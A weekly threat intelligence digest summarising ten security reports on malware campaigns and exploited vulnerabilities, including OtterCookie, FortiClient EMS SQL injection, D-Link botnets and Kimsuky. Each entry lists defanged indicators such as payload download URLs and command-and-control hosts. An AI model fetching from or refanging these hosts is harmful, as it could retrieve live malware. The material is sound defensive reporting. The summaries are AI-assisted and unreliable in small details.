RST TI Report Digest: 30 Dec 2024

This is a weekly threat intelligence report review from RST Cloud. This week, we analyzed 32 threat intelligence reports and compiled a concise summary of each, along with pertinent metadata that was extracted. You can find below a short summary of 10 reports, related threats, tools, threat actors, a link to the source, and a number of extracted indicators of compromise (IoCs) from the original reports. More granular information, including TTPs, on all reports is available via RST Report Hub.Title: OtterCookie, a new malware used by Contagious InterviewLink: https://jp.security.ntt/tech_blog/contagious-interview-ottercookieSummary: The Contagious Interview attack campaign, attributed to North Korea and reported by Palo Alto Networks in November 2023, is financially motivated and targets a broad range of victims, notably impacting Japanese organizations. The campaign has evolved to include new malware named OtterCookie, which emerged in November 2024 and showcases different functionalities and behaviors compared to earlier iterations. OtterCookie interactions are facilitated through Socket.IO and includes features for executing commands and extracting sensitive information, such as cryptocurrency wallet keys, with loaders that execute JavaScript code retrieved from various sources, including Node.js projects and npm packages. The evolving nature of the malware indicates a pattern of experimentation by the attackers, emphasizing the need for vigilance due to the reported incidents.Threats: contagious_interview_campaign ottercookie beavertail invisibleferretIndicators of compromise:-------------------------ip: 45[.]159[.]248[.]55domain: zkservice[.]cloud, w3capi[.]marketing, payloadrpc[.]comurl: hash: - sha256=d19ac8533ab14d97f4150973ffa810e987dea853bb85edffb7c2fcef13ad2106, - sha256=7846a0a0aa90871f0503c430cc03488194ea7840196b3f7c9404e0a536dbb15e, - sha256=4e0034e2bd5a30db795b73991ab659bda6781af2a52297ad61cae8e14bf05f79, - sha256=32257fb11cc33e794fdfd0f952158a84b4475d46f531d4bee06746d15caf8236Title: How Attackers Exploit Patched Vulnerability in FortiClient EMSLink: https://securelist.ru/patched-forticlient-ems-vulnerability-exploited-in-the-wild/111437Summary: Kaspersky Lab's Global Emergency Response Team (GERT) identified a cyber threat exploiting vulnerability CVE-2023-48788 in FortiClient EMS, affecting versions 7.0.1 through 7.0.10 and 7.2.0 through 7.2.2, due to improper SQL command input filtering that allows SQL injection attacks. The investigation revealed that attackers targeted a Windows server utilized by an organization for policy downloads and VPN access, using remote management tools like ScreenConnect and AnyDesk to execute arbitrary commands and conduct lateral movement. Evidence from system logs indicated malicious SQL injection activity and highlighted the attackers' method of employing base64-encoded URLs for downloading and executing tools, with telemetry data showing a multi-regional targeting approach particularly concentrated in South America, and an IP linked to a Russian region.Threats: screenconnect_tool anydesk_tool netscan_tool cobalt_strike lockbit conti connectwise_tool mimikatz_tool mimik_toolIndicators of compromise:-------------------------ip: 45[.]141[.]84[.]45, 185[.]216[.]70[.]170:1337domain: infinity[.]screenconnect[.]com, kle[.]screenconnect[.]com, trembly[.]screenconnect[.]com, corsmich[.]screenconnect[.]comurl: https://infinity[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Acce, https://sipaco2[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://trembly[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://corsmich[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://myleka[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://petit[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://lindeman[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://sorina[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://kle[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://infinity[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://solarnyx2410150445[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://allwebemails1[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, https://web-r6hl0n[.]screenconnect[.]com/Bin/ScreenConnect[.]ClientSetup[.]exe?e=Access&y=Guest, http://185[.]196[.]9[.]31:8080/bd7OZy3uMQL-YabI8FHeRw, https://webhook[.]site/7ece827e-d440-46fd-9b22-cc9a01db03c8, https://webhook[.]site/d0f4440c-927c-460a-a543-50d4fc87c8a4, http://185[.]216[.]70[.]170, http://185[.]216[.]70[.]170/oo[.]bat, http://185[.]216[.]70[.]170/hello, http://185[.]216[.]70[.]170/sos[.]txt, http://185[.]216[.]70[.]170/72[.]bat, http://206[.]206[.]77[.]33:8080/xeY_J7tYzjajqYj4MbtB0w, http://5[.]61[.]59[.]201:8080/FlNOfGPkOL4qc_gYuWeEYQ, http://5[.]61[.]59[.]201:8080/7k9XBvjahnQK09abSc8SpA, https://www[.]lidahtoto2[.]com/assets/im[.]ps1, http://87[.]120[.]125[.]55:8080/BW_qY1OFZRv7iNiY_nOTFQhash: - sha1=8cfd968741a7c8ec2dcbe0f5333674025e6be1dc, - sha1=441a52f0112da187244eeec5b24a79f40cc17d47, - sha1=746710470586076bb0757e0b3875de9c90202be2, - sha1=bc29888042d03fe0ffb57fc116585e992a4fdb9b, - sha1=73f8e5c17b49b9f2703fed59cc2be77239e904f7, - sha1=841fff3a36d82c14b044da26967eb2a8f61175a8, - sha1=34162aaf41c08f0de2f888728b7f4dc2a43b50ec, - sha1=cf1ca6c7f818e72454c923fea7824a8f6930cb08, - sha1=e3b6ea8c46fa831cec6f235a5cf48b38a4ae8d69, - sha1=59e1322440b4601d614277fe9092902b6ca471c2, - sha1=75ebd5bab5e2707d4533579a34d983b65af5ec7f, - sha1=83cff3719c7799a3e27a567042e861106f33bb19, - sha1=44b83dd83d189f19e54700a288035be8aa7c8672, - sha1=8834f7ab3d4aa5fb14d851c7790e1a6812ea4ca8Title: Botnets Continue to Target Aging D-Link VulnerabilitiesLink: https://www.fortinet.com/blog/threat-research/botnets-continue-to-target-aging-d-link-vulnerabilitiesSummary: FortiGuard Labs reported a rise in activity from two botnets, "FICORA" and "CAPSAICIN," in October and November 2024, targeting D-Link devices vulnerable through the Home Network Administration Protocol (HNAP). "FICORA," traced back to servers in the Netherlands, utilizes a shell script to execute DDoS attacks and employs a Mirai variant, while "CAPSAICIN" is particularly active in East Asia and uses scripts to connect to control servers for various remote commands. Both botnets exploit several known vulnerabilities, underscoring the ongoing risk posed by unpatched devices.Threats: ficora capsaicin mirai kaiten udpflood_technique yakuza keksec_groupIndicators of compromise:-------------------------ip: 185[.]191[.]126[.]213, 185[.]191[.]126[.]248, 87[.]10[.]220[.]221, 192[.]110[.]247[.]46, 103[.]149[.]87[.]69, 87[.]11[.]174[.]141, 45[.]86[.]86[.]60, 194[.]110[.]247[.]46domain: ru[.]coziest[.]lol, f[.]codingdrunk[.]cc, www[.]codingdrunk[.]in, le[.]codingdrunk[.]in, pirati[.]abuser[.]euurl: http://103[.]149[.]87[.]69/multi, http://103[.]149[.]87[.]69/la[.]bot[.]arc, http://103[.]149[.]87[.]69/la[.]bot[.]arm, http://103[.]149[.]87[.]69/la[.]bot[.]arm5, http://103[.]149[.]87[.]69/la[.]bot[.]arm6, http://103[.]149[.]87[.]69/la[.]bot[.]arm7, http://103[.]149[.]87[.]69/la[.]bot[.]m68k, http://103[.]149[.]87[.]69/la[.]bot[.]mips, http://103[.]149[.]87[.]69/la[.]bot[.]mipsel, http://103[.]149[.]87[.]69/la[.]bot[.]powerpc, http://103[.]149[.]87[.]69/la[.]bot[.]sh4, http://103[.]149[.]87[.]69/la[.]bot[.]sparc, http://87[.]11[.]174[.]141/bins[.]sh, http://pirati[.]abuser[.]eu/yakuza[.]yak[.]sh, http://pirati[.]abuser[.]eu/yakuza[.]arm5, http://pirati[.]abuser[.]eu/yakuza[.]arm6, http://pirati[.]abuser[.]eu/yakuza[.]arm7, http://pirati[.]abuser[.]eu/yakuza[.]i586, http://pirati[.]abuser[.]eu/yakuza[.]i686, http://pirati[.]abuser[.]eu/yakuza[.]m68k, http://pirati[.]abuser[.]eu/yakuza[.]mips, http://pirati[.]abuser[.]eu/yakuza[.]mipsel, http://pirati[.]abuser[.]eu/yakuza[.]ppc, http://pirati[.]abuser[.]eu/yakuza[.]sparc, http://pirati[.]abuser[.]eu/yakuza[.]x86, http://87[.]10[.]220[.]221/bins[.]sh, http://87[.]10[.]220[.]221/yakuza[.]sh, http://87[.]10[.]220[.]221/yakuza[.]arm4, http://87[.]10[.]220[.]221/yakuza[.]arm5, http://87[.]10[.]220[.]221/yakuza[.]arm6, http://87[.]10[.]220[.]221/yakuza[.]arm7, http://87[.]10[.]220[.]221/yakuza[.]i586, http://87[.]10[.]220[.]221/yakuza[.]i686, http://87[.]10[.]220[.]221/yakuza[.]m68k, http://87[.]10[.]220[.]221/yakuza[.]mips, http://87[.]10[.]220[.]221/yakuza[.]mipsel, http://87[.]10[.]220[.]221/yakuza[.]ppc, http://87[.]10[.]220[.]221/yakuza[.]sparc, http://87[.]10[.]220[.]221/yakuza[.]x86hash: - sha256=9b161a32d89f9b19d40cd4c21d436c1daf208b5d159ffe1df7ad5fd1a57610e5, - sha256=faeea9d5091384195e87caae9dd88010c9a2b3b2c88ae9cac8d79fd94f250e9f, - sha256=10d7aedc963ea77302b967aad100d7dd90d95abcdb099c5a0a2df309c52c32b8, - sha256=7f6912de8bef9ced5b9018401452278570b4264bb1e935292575f2c3a0616ec4, - sha256=a06fd0b8936f5b2370db5f7ec933d53bd8a1bf5042cdc5c052390d1ecc7c0e07, - sha256=764a03bf28f9eec50a1bd994308e977a64201fbe5d41337bdcc942c74861bcd3, - sha256=df176fb8cfbc7512c77673f862e73833641ebb0d43213492c168f99302dcd5e3, - sha256=ac2df391ede03df27bcf238077d2dddcde24cd86f16202c5c51ecd31b7596a68, - sha256=ca3f6dce945ccad5a50ea01262b2d42171f893632fc5c5b8ce4499990e978e5b, - sha256=afee245b6f999f6b9d0dd997436df5f2abfb3c8d2a8811ff57e3c21637207d62, - sha256=ec508df7cb142a639b0c33f710d5e49c29a5a578521b6306bee28012aadde4a8, - sha256=8349ba17f028b6a17aaa09cd17f1107409611a0734e06e6047ccc33e8ff669b0, - sha256=b3ad8409d82500e790e6599337abe4d6edf5bd4c6737f8357d19edd82c88b064, - sha256=ec87dc841af77ec2987f3e8ae316143218e9557e281ca13fb954536aa9f9caf1, - sha256=784c9711eadceb7fedf022b7d7f00cff7a75d05c18ff726e257602e3a3ccccc1, - sha256=bde6ef047e0880ac7ef02e56eb87d5bc39116e98ef97a5b1960e9a55cea5082b, - sha256=c7be8d1b8948e1cb095d46376ced64367718ed2d9270c2fc99c7052a9d1ffed7, - sha256=4600703535e35b464f0198a1fa95e3668a0c956ab68ce7b719c28031d69b86ff, - sha256=6e3ef9404817e168c974000205b27723bc93abd7fbf0581c16bb5d2e1c5c6e4a, - sha256=32e66b87f47245a892b102b7141d3845540b270c278e221f502807758a4e5dee, - sha256=540c00e6c0b53332128b605b0d5e0926db0560a541bb13448d094764844763df, - sha256=b74dbd02b7ebb51700f3c5900283e46570fe497f9b415d25a029623118073519, - sha256=148f6b990fc1f1903287cd5c20276664b332dd3ba8d58f2bf8c26334c93c3af5, - sha256=464e2f1faab2a40db44f118f7c3d1f9b300297fe6ced83fabe87563fc82efe95, - sha256=b699cd64b9895cdcc325d7dd96c9eca623d3ec0247d20f39323547132c8fa63b, - sha256=1007f5613a91a5d4170f28e24bfa704c8a63d95a2b4d033ff2bff7e2fe3dcffe, - sha256=7a815d4ca3771de8a71cde2bdacf951bf48ea5854eb0a2af5db7d13ad51c44ab, - sha256=d6a2a22000d68d79caeae482d8cf092c2d84d55dccee05e179a961c72f77b1ba, - sha256=7ab36a93f009058e60c8a45b900c1c7ae38c96005a43a39e45be9dc7af9d6da8, - sha256=803abfe19cdc6c0c41acfeb210a2361cab96d5926b2c43e5eb3b589a6ed189ad, - sha256=7b29053306f194ca75021952f97f894d8eae6d2e1d02939df37b62d3845bfdb7, - sha256=59704cf55b9fa439d6f7a36821a50178e9d73ddc5407ff340460c054d7defc54, - sha256=aaa49b7b4f1e71623c42bc77bb7aa40534bcb7312da511b041799bf0e1a63ee7, - sha256=1ca1d5a53c4379c3015c74af2b18c1d9285ac1a48d515f9b7827e4f900a61bde, - sha256=f71dc58cc969e79cb0fdfe5163fbb9ed4fee5e13cc9407a11d231601ee4c6e23, - sha256=ea83411bd7b6e5a7364f7b8b9018f0f17f7084aeb58a47736dd80c99cfeac7f1, - sha256=48a04c7c33a787ef72f1a61aec9fad87d6bd9c49542f52af7e029ac83475f45d, - sha256=18c92006951f93a77df14eca6430f32389080838d97c9e47364bf82f6c21a907Title: Rhadamanthys Stealer Spoofs Emails to Attack Switzerland and the United KingdomLink: https://www.forcepoint.com/blog/x-labs/rhadamanthys-stealer-phishing-switzerland-united-kingdomSummary: Lydia's blog post discusses the emerging threat of XWorm malware in the hospitality sector, while X-Labs has identified the Rhadamanthys infostealer as a concurrent threat targeting businesses in Switzerland and the UK, especially hotels and restaurants. This infostealer utilizes advanced social engineering techniques through malicious emails that appear to be from Booking.com, featuring PDF attachments designed to trick users into executing harmful JavaScript code. The campaign demonstrates sophisticated obfuscation methods that complicate detection, along with leveraging typo-squatted domains and cloud services to evade security measures and extract sensitive information through established connections to a command-and-control server.Threats: rhadamanthys xworm_rat agent_tesla typosquatting_technique dotnet_reactor_toolIndicators of compromise:-------------------------ip: 185[.]196[.]8[.]68, 185[.]196[.]11[.]18domain: b00king[.]biz, b00king[.]networkurl: https://11decmain[.]blogspot[.]com/////////////loraaaa[.]pdf, https://bitbucket[.]org/!api/2[.]0hash: - sha1=64cd7a0416f33a5e45dbc4b2c7ec5057e0acb21bTitle: Analysis of attack cases targeting domestic solutions of Andariel Group (SmallTiger)Link: https://asec.ahnlab.com/ko/85270Summary: The Andariel group has been targeting domestic companies' software, particularly asset management and data leak prevention solutions, while exploiting various vulnerabilities to install malware, primarily SmallTiger. The attackers hijack control servers and utilize indiscriminate and dictionary attacks on exposed update servers to replace legitimate programs with malicious ones. Their tactics include enabling Remote Desktop Protocol (RDP) access to infected systems and installing additional tools, while their command-and-control server has been identified, highlighting their ongoing focus on exploiting vulnerabilities in domestic solutions.Threats: andariel_group smalltiger modeloader advanced-port-scanner_tool netstat_toolIndicators of compromise:-------------------------ip: 20[.]20[.]100[.]32, 45[.]61[.]148[.]153domain: url: http://45[.]61[.]148[.]153/pizza[.]jsphash: - md5=3525a8a16ce8988885d435133b3e85d8, - md5=45ef2e621f4c530437e186914c7a9c62, - md5=6a58b52b184715583cda792b56a0a1ed, - md5=b500a8ffd4907a1dfda985683f1de1dfTitle: XWorm Malware Targets United Kingdom s Hospitality SectorLink: https://www.forcepoint.com/blog/x-labs/xworm-malware-targets-united-kingdom-hospitality-sectorSummary: XWorm is a sophisticated Remote Access Tool (RAT) being offered as Malware-as-a-Service (MaaS) on darknet forums, recently uncovered by X-Labs through a phishing campaign targeting the UK hospitality industry. The campaign involves emails masquerading as communications from Booking.com, leading recipients to a malicious website that hosts obfuscated scripts designed to deploy the XWorm malware. These scripts, which clear the DNS cache to conceal activities, deploy payloads by evading detection through techniques like modifying the hex entries of PE files and creating autorun registry keys to maintain persistence. The malware's stealthy mechanisms and use of PowerShell scripts highlight its advanced capabilities and the challenges in detecting such attacks.Threats: xworm_rat confuser_toolIndicators of compromise:-------------------------ip: 92[.]255[.]57[.]155domain: url: https://extraguestreview[.]com#3Vrn_OYy, http://92[.]255[.]57[.]155/1/1[.]png, http://92[.]255[.]57[.]155/1, http://92[.]255[.]57[.]155/Capcha[.]html, http://92[.]255[.]57[.]155/1/2[.]pnghash: - sha256=6c327eec94240fa4d1b7141396a7a1e01d76120ab7fca9ae38e5202ce2e916f9, - sha256=ffac95298176d8441ae088c6d5e95b0892afa9768876d3c749404eb31d4b4b6aTitle: ICS Threat Analysis: New, Experimental Malware Can Kill Engineering ProcessesLink: https://www.forescout.com/blog/ics-threat-analysis-new-experimental-malware-can-kill-engineering-processesSummary: Recent incidents have revealed multiple malware threats targeting engineering workstations within the Operational Technology/Industrial Control Systems (OT/ICS) environment, including samples like test.exe, Isass.exe, and a new strain called Chaya_003, which can disrupt Siemens processes. The report highlights ongoing infections by the Ramnit worm affecting Mitsubishi and Siemens systems, along with OT-specific malware such as FrostyGoop and BUSTLEBERM. Additionally, automated botnets like Aisuru, Kaiten, and Gafgyt have been identified, exploiting default credentials to access OT devices and potentially erase sensitive data directories. The SANS Institute's findings further emphasize compromised engineering workstations as a significant attack vector in OT incidents, with the development of a YARA rule aiding in detection of malicious interactions with engineering software linked to these threats.Threats: ramnit chaya_003 frostygoop aisuru kaiten bashlite phoenix_keylogger zeus bumblebee sality virut expiro jeefo neshta parite floxif upx_tool chaya_002_group asyncrat wacapewIndicators of compromise:-------------------------ip: domain: 432i[.]com, az-security[.]info, 0g0d[.]com, grpaper[.]com, x86assembly[.]xyzurl: hash: - sha256=703f0aac78d388f1fbe3800697015d092fa70cea2c01f22f456c8b1aa20a2334, - sha256=1b8957804dfa7324d10bf6d7ca22fc038951ab57ab1e6838da9c63ad057c1d20, - sha256=5b63ca75f95dc549729bb6261e9dc22f6425547584366188770507bd964221b4, - sha256=5ec05f903cc94d559b8eb23aa749805b78de2845bd2317017bc8e50cdceb613f, - sha256=69eb2b940ba1fc7bc46699eeb3ff11d921683609f636efae05c0cb796b588a38, - sha256=8b585155cdc7fcbe3d2fa169b307756557ef0d69afb392726f577a73f11d5a97, - sha256=a1d721db0583eed0077bb8ab542ff15a806d24e2dbf13557b12842bd49995354, - sha256=ad5922bcc740e5761a708c526d023450ca278168ebcefaaf80f85815d6d6d24e, - sha256=c1826e0d310a6a02f2ee1b5d88b6c0dd48baa8fe1dd99447e98e42c4ca023c96, - sha256=fd8558b8a4165ebb47f120fa237c2ada306c430ae4cb2109eb644fd8b0b82b15, - sha256=fd6c69c345f1e32924f0a5bb7393e191b393a78d58e2c6413b03ced7482f2320, - sha256=1f1035b91db1264eb94aa055cdb50f35f0c27744e77e74b7031e099b112a5837, - sha256=b16a67f49ce5aa057236d2bff3e1ab2dcc2c6d3f2551e4520f54e125b2e289d8, - sha256=517e35b32c4a1dedb155bbd208422cd5c5d34b5ec378712b7e8182fd26473c7e, - sha256=9579c6987ac8969d0b0cc0cc2a9da3b034fac41525d96fa79fa02d05813e70f9Title: DarkVision RAT: A Persistent Threat Delivered via PureCrypterLink: https://socradar.io/darkvision-rat-a-threat-delivered-via-purecrypterSummary: The DarkVision RAT malware campaign, utilizing the PureCrypter loader, presents a significant threat to sectors including finance, healthcare, and government. Discovered through phishing techniques, this Remote Access Trojan employs sophisticated obfuscation tactics to evade detection and enables attackers to gain remote access for activities such as keylogging, screen and audio capture, and system manipulations. DarkVision RAT initiates infection by decrypting malware and utilizes advanced methods such as API calls and process injection, with Command and Control communications conducted over non-standard ports, complicating detection efforts.Threats: darkvisionrat purecryptor process_injection_techniqueIndicators of compromise:-------------------------ip: domain: severdops[.]ddns[.]net:8120url: http://nasyiahgamping[.]com/yknoahdrv[.]exehash: - sha256=cd64122c8ee24eaf02e6161d7b74dbe79268f3b7ffb7a8b0691a61ff409f231d, - sha256=27ccb9f336282e591e44c65841f1b5bc7f495e8561349977680161e76857be5d, - sha256=7aa49795bbe025328e0aa5d76e46341a95255e13123306311671678fdeabb617Title: Strela Stealer Targeting Ukraine Alongside Other European CountriesLink: https://www.sonicwall.com/blog/strela-stealer-targeting-ukraine-alongside-other-european-countriesSummary: The SonicWall Capture Labs threat research team is monitoring an updated variant of the Strela Stealer malware, which has been active throughout 2024. This variant not only targets email credentials from Outlook and Thunderbird but also gathers system configuration details using the "systeminfo" utility. The infection process begins with a JavaScript attachment in phishing emails, leading to a PowerShell script that executes a primary DLL, which obfuscates the payload using a customized XOR decryption method. The malware features enhanced obfuscation techniques, complicating analysis efforts, and it now includes Ukraine in addition to its original focus on European countries such as Spain, Italy, and Germany.Threats: strela_stealer junk_code_techniqueIndicators of compromise:-------------------------ip: 94[.]159[.]113[.]204domain: url: http://94[.]159[.]113[.]204/up[.]phphash: - sha256=d27a551d2236b3b36b0fcf5c4caa42fc209ec6aeb1d8971c9b0e91892aca1ca2, - sha256=0ad95c8780adfa4271d2a9c910d83368513c5c95536b82b5bd098f1d0a74075c, - sha256=48211afd43defedfee988ddd61304c263713532df59354592930de28806d0fd5Title: Exposing the Steps of the Kimsuky APT GroupLink: https://www.picussecurity.com/resource/blog/exposing-the-steps-of-the-kimsuky-apt-groupSummary: Kimsuky, or Black Banshee, is a North Korean cyber threat group that has been active since at least 2013, focusing on espionage targeting political, military, and economic organizations, particularly in South Korea, the U.S., Japan, Russia, and Europe. The group has evolved from basic social engineering to using advanced cyber tools such as RandomQuery, xRAT, and Gold Dragon, engaging in multi-stage attacks for intelligence gathering. Notable campaigns include the 2020 attacks on U.S. defense contractors and the DEEP#GOSU operation in 2024, which demonstrated their use of techniques like spear phishing, malware deployment, credential access, and sophisticated command and control methods, all indicating a strong alignment with geopolitical objectives rather than financial gain.Threats: kimsuky_group gold_dragon randomquery xrat_rat deep_gosu_campaign trurat spear-phishing_technique lolbin_technique process_injection_technique metasploit_tool credential_dumping_technique procdump_tool credential_harvesting_technique babyshark powershell_keylogger_tool mechanical_keylogger sniffpass_tool cryptojacker teamviewer_toolIndicators of compromise:-------------------------ip: domain: url: https://niscarea[.]com, http://00701111[.]000webhostapp[.]com/wp-extra/show[.]php?query=50hash: - sha256=081804b491c70bfa63ecdbe9fd4618d3570706ad8b71dba13e234069648e5e48, - sha256=0b5db31e47b0dccfdec46e74c0e70c6a1684768dbacc9eacbb4fd2ef851994c7, - sha256=15d53bb839e00405a34a8b690ec181f5555fc4f891b8248ae7fa72bad28315a9, - sha256=1617587ccdf5b0344089559ecf8fe7d39f6e07a6a64f74f2b44bfa2c8cb67983, - sha256=1b75f70c226c9ada8e79c3fdd987277b0199928800c51e5a1e55ff01246701db, - sha256=2360a69e5fd7217e977123c81d3dbb60bf4763a9dae6949bc1900234f7762df1, - sha256=2546d239a262c24a6f8ea01d890cbc459a22db79b379b6ec3b24fbb56efb5381, - sha256=3c8dbfcbb4fccbaf924f9a650a04cb4715f4a58d51ef49cc75bfcef0ac258a3e, - sha256=3ea2ead8f3cec030906dcbffe3efd5c5d77d5d375d4a54cca03bfe8a6cb59940, - sha256=46a5d54c264152ce915792af31c75824a558af7d7340d78b34e146d8c6249e79, - sha256=479038eb12ed07893ee0dcc04fbdcf182489bbb271f5a4f90f83874881a80ce3, - sha256=492a643bd1efdaca4ca125ade1b606e7bbf00e995ac9115ac84d1c4c59cb66dd, - sha256=5009c7d1590c1f8c05827122172583ddf924c53b55a46826abf66da46725505a, - sha256=5c907b722c53a5be256dc5f96b755bc9e0b032cc30973a52d984d4174bace456, - sha256=5e40d106977017b1ed235419b1e59ff090e1f43ac57da1bb5d80d66ae53b1df8, - sha256=60666cacdd6806ed05771f32eaa719e3efd2f4db55f28a447d383c3eac1dc72e, - sha256=63fb47c3b4693409ebadf8a5179141af5cf45a46d1e98e5f763ca0d7d64fb17c, - sha256=689cfaa9319f3f7529a31472ecf6b2e0ca6891b736de009e0b6c2ebac958cc94, - sha256=69c917ea96db28dbd5b67073ca0aac234d25651a849171b45f20979eafa05a1c, - sha256=6c121f2b2efa6592c2c22b29218157ec9e63f385e7a1d7425857d603ddef8c59, - sha256=7667d1b8fcc4f712084e3e3f8b4ab505ab150c52aea7b219249ec508b4b0e224, - sha256=87c5d0c93b80acf61d24e7aaf0faae231ab507ca45483ad3d441b5d1acebc43c, - sha256=89cad9a57985cc0ab3b7403a943ad0aa7b167dc7a3c38557417fedea67a77b87, - sha256=8bfa4fe0534c0062393b6a2597c3491f7df3bf2eabfe06544c53bdf1f38db6d4, - sha256=91eaf215be336eae983d069de16630cc3580e222c427f785e0da312d0692d0fd, - sha256=927b3564c1cf884d2a05e1d7bd24362ce8563a1e9b85be776190ab7f8af192f6, - sha256=973f7939ea03fd2c9663dafc21bb968f56ed1b9a56b0284acf73c3ee141c053c, - sha256=99dbc6fe3c3e465052fcefa1642861747dc9e069eeb244589b605bd710b1e0d1, - sha256=a03d13c9825e150810e6e6aaf053d71ec5a53b86581414dd982a74d4a8bc5475, - sha256=a64fa9f1c76457ecc58402142a8728ce34ccba378c17318b3340083eeb7acc67, - sha256=b72caab78d164637fea0937d7a94fc470579ec6bb4fa87dadb6f0fa7826e217c, - sha256=bce1eb513aaac344b5b8f7a9ba9c9e36fc89926d327ee5cc095fb4a895a12f80, - sha256=bfd74b4a1b413fa785a49ca4a9c0594441a3e01983fc7f86125376fdbd4acf6b, - sha256=c6a48365c3db9761bd60981bdcdd87aced23d8e60067caa30fee501bf4b47b84, - sha256=c7f4aa77be7f7afe9d0665d3e705dbf7794bc479bb9c44488c7bf4169f8d14fe, - sha256=c83c7b000a955f2b8cb92bb112ed606ffd9fbebbe3422f80d90d06b167f2f37b, - sha256=c9a7b42c7b29ca948160f95f017e9e9ae781f3b981ecf6edbac943e52c63ffc8, - sha256=cbf4cfa2d3c3fb04fe349161e051a8cf9b6a29f8af0c3d93db953e5b5dc39c86, - sha256=d8565d58ad8e4f5558b5cd70df0ad12be9cf44e32ad07aaac6f65b816edbf414, - sha256=db6a9934570fa98a93a979e7e0e218e0c9710e5a787b18c6948f2eedd9338984, - sha256=e6bbc33815b9f20b0cf832d7401dd893fbc467c800728b5891336706da0dbcec, - sha256=f1713afaf5958bdf3e975ebbab8245a98a84e03f8ce52175ef1568de208116e0, - sha256=f262588c48d2902992ffd275d2be6362fe7f02e2f00a44ab8c75ac1a2827c6e9, - sha256=f3b0da965a4050ab00fce727bb31e0f889a9c05d68d777a8068cfc15a71d3703, - sha256=fee4f9dabc094df24d83ec1a8c4e4ff573e5d9973caa676f58086c99561382d7This article was generated with the assistance of an artificial intelligence language model, ChatGPT.